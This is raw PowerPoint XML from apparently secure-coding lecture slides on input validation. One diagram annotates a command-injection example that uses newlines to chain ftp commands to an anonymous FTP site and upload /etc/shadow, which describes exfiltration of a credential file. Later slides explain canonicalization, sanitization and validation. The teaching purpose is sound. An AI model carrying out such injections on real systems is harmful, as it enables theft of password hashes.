                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2133600"/>
              <a:ext cx="1851789" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>new command</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="15" idx="0"/>
              <a:endCxn id="16" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1485900" y="2533710"/>
              <a:ext cx="1954595" cy="742890"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="Group 78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1676400" y="2133600"/>
            <a:ext cx="6788870" cy="1600200"/>
            <a:chOff x="1676400" y="2133600"/>
            <a:chExt cx="6788870" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1676400" y="3276600"/>
              <a:ext cx="1295400" cy="457200"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4980022" y="2133600"/>
              <a:ext cx="3485248" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>allows use of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\n</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t> for newlines</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Connector 21"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="20" idx="0"/>
              <a:endCxn id="21" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2324100" y="2333655"/>
              <a:ext cx="2655922" cy="942945"/>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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Elbow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="3505200"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="Group 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3048000" y="2667000"/>
            <a:ext cx="5505951" cy="1066800"/>
            <a:chOff x="3048000" y="2667000"/>
            <a:chExt cx="5505951" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3048000" y="3276600"/>
              <a:ext cx="4572000" cy="457200"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4267200" y="2667000"/>
              <a:ext cx="4286751" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>authenticate to anonymous FTP site</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="48" name="Straight Connector 47"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="27" idx="0"/>
              <a:endCxn id="28" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="3067110"/>
              <a:ext cx="1076576" cy="209490"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="Group 80"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228600" y="3810000"/>
            <a:ext cx="8125837" cy="1152674"/>
            <a:chOff x="228600" y="3810000"/>
            <a:chExt cx="8125837" cy="1152674"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3810000"/>
              <a:ext cx="5486400" cy="381000"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6477000" y="3962400"/>
              <a:ext cx="1877437" cy="1000274"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Upload </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/shadow</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="Straight Connector 51"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="38" idx="3"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="4000500"/>
              <a:ext cx="762000" cy="462037"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="82" name="Group 81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228600" y="4267200"/>
            <a:ext cx="2658958" cy="1162110"/>
            <a:chOff x="228600" y="4267200"/>
            <a:chExt cx="2658958" cy="1162110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangle 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="4267200"/>
              <a:ext cx="1447800" cy="381000"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="TextBox 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="304800" y="5029200"/>
              <a:ext cx="2582758" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>all commands to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ftp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="Straight Connector 66"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="65" idx="2"/>
              <a:endCxn id="66" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="952500" y="4648200"/>
              <a:ext cx="643679" cy="381000"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="Group 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2438400" y="4267200"/>
            <a:ext cx="5867400" cy="1930063"/>
            <a:chOff x="2438400" y="4267200"/>
            <a:chExt cx="5867400" cy="1930063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Rectangle 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2438400" y="4267200"/>
              <a:ext cx="685800" cy="381000"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="TextBox 72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="5181600"/>
              <a:ext cx="4724400" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>don't auto-login or prompt user for username/password; no interactive prompting during file </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>xfer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="74" name="Straight Connector 73"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="72" idx="2"/>
              <a:endCxn id="73" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2781300" y="4648200"/>
              <a:ext cx="3162300" cy="533400"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47761178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dissolve">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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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79"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>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80"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="80"/>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>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83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="5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Validation &amp; Sanitization</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Programs must take steps to ensure that any data that crosses a trust boundary is both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> This can include appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canonicalization &amp; normalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input Sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These steps must be taken in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>exactly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Although steps may be omitted when appropriate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555542018"/>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Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String dir = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
